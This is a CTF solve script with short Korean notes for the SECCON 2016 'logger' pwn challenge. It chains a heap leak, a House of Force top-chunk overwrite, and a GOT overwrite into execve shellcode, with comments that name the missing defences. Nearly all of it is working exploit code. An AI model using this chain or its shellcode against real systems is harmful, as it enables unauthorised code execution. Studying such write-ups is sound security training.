top chunk를 ffffffffffffffff로 덮고 다음 malloc 할 때 GOT 부분을 할당받으면 된다
0x00400000 0x00402000 r-xp /root/logger
0x00601000 0x00602000 r-xp /root/logger
0x00602000 0x00603000 rwxp /root/logger
0x00603000 0x00624000 rwxp [heap]
heap의 권한이 rwxp이기 때문에 힙에다 쉘코드를 넣으면 된다
# SECCON 2016 "logger" solve script (Python 2 / pwntools: print statements,
# str payloads). Technique: House of Force on an rwx heap, finishing with a
# GOT overwrite that redirects execution into shellcode stored in the
# overwritten region.
#
# Defensive note -- the chain depends on three things the target lacked:
#   * a top-chunk size sanity check (glibc >= 2.29 aborts with
#     "malloc(): corrupted top size", which defeats House of Force),
#   * full RELRO (a read-only GOT cannot be overwritten at runtime),
#   * a non-executable heap/data segment (the memory map above shows the
#     0x602000 data page and the heap both mapped rwxp, so the shellcode
#     stage can run in place).
from pwn import *

elf = "/root/pwn/seccon/logger"
#lib32 = "/root/pwn/seccon/libc-2.19.so-c4dc1270c1449536ab2efbbe7053231f1a776368"
#lib64 = "/lib/x86_64-linux-gnu/libc-2.21.so"

# Two connections to the same service. Both log in with the same id below,
# presumably so they operate on one shared log file -- verify against the binary.
# s = process(elf)
# s1 = process(elf)
s = remote('logger.pwn.seccon.jp',6565)
s1 = remote('logger.pwn.seccon.jp',6565)
e = ELF(elf)  # loaded but not referenced further in this script
#l = ELF(lib32)

DEBUG = 0
if DEBUG > 0:
    # local-process debugging aid; only meaningful with process(elf) above
    print "PID : %d" % util.proc.pidof(s)[0]
if DEBUG == 2:
    context.log_level = 'debug'

# Fresh id per run (current timestamp as a string); both sessions use it.
uid = str(time.time())
#uid = "debug"

# Session 1: menu option 1, then the id is sent twice (presumably id and
# password, or id plus confirmation -- the prompts are not read here).
s.recvuntil("exit")
s.sendline("1")
s.sendline(uid)
s.sendline(uid)
s.recvuntil("exit")
print "[*] id : %s" % uid

# Session 2: same login, same id.
s1.sendline("1")
s1.sendline(uid)
s1.sendline(uid)

def read(ss):
    """Menu 1: read the log.

    Returns the service output up to the next menu, with the trailing
    "1. Read log" menu text stripped off.
    """
    ss.sendline("1")
    return ss.recvuntil("exit").split("1. Read log")[0]

def append(ss,size,data):
    """Menu 2: append `data` to the log.

    `size` is the answer to the service's "128byte" size prompt and is sent
    as-is (str()), so callers may pass any string -- the House of Force step
    below relies on sending a value the prompt's wording suggests should be
    limited to 128 bytes. The root cause being exploited appears to be that
    this user-supplied size is not validated before it reaches malloc.
    """
    ss.sendline("2")
    ss.recvuntil("128byte")
    ss.sendline(str(size))
    ss.sendline(data)
    ss.recvuntil("exit")

def leak(ss):
    """Menu 3: recover a pointer-sized value from the service output.

    Skips 32 bytes after "filename: ", takes the bytes up to the next "=",
    and zero-pads to 8 bytes so the caller can u64() it. The 32-byte skip and
    the "=" delimiter match this service's output format -- re-check them if
    the binary changes. Used below as a heap address leak.
    """
    ss.sendline("3")
    ss.recvuntil("filename: ")
    ss.recv(32)
    t = ss.recvuntil("=")[:-1]
    t += ("\x00" * (8-len(t)))
    ss.recvuntil("exit")
    return t

#buf = malloc(file_size) leak
heap_addr = u64( leak(s) )  # heap pointer disclosed through menu 3
print "[*] LEAK_HEAP : %x" % heap_addr

#house of force
#topchunk = ffffffffffffffff
# 32 bytes of 0xff are appended through the second session; read() on the
# first session then loads the shared log into its own heap, which is what
# places 0xffffffffffffffff over the top chunk's size field (see the note at
# the top of the page). Whether the 0xff bytes land exactly on the size
# field depends on the heap layout at that moment -- confirm in a debugger.
append(s1,32,"\xff"*32)
read(s)

# Allocation size chosen so the top chunk is moved to just below the GOT
# area (0x602050 lies in the rwxp 0x602000-0x603000 mapping of the binary,
# see the memory map above). The 0x28 presumably accounts for the chunk
# header/alignment; the commented-out "- (32+16)" is an earlier attempt.
# The resulting value is negative (printed with %d) and only works if the
# service hands it to malloc unchecked.
offset = 0x602050 - 0x28 - heap_addr# - (32+16)
print "[*] offset : %d" % offset
#append(s,"%d"%offset,"A")
append(s,"%d"%offset,"")

#got Overwrite
# The next 128-byte append is now carved out of the relocated top chunk,
# i.e. from the GOT page. Payload: NOP sled padded to 0x40 bytes ending in
# the 27-byte shell-storm 806 shellcode (mov al,0x3b / syscall = execve),
# followed by 0x602080 -- expected to overwrite a GOT slot with a pointer
# back into the sled. Which slot that is, and where the 128-byte write
# actually begins, depends on the real chunk address; verify against the
# binary's relocation table under a debugger.
s.sendline("2")
s.sendline("128")
#http://shell-storm.org/shellcode/files/shellcode-806.php
sc = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
sc = "\x90"*(0x40-len(sc)) + sc
sc += p64(0x602080)
s.sendline(sc)
s.interactive()  # the hijacked GOT entry fires on the next call through it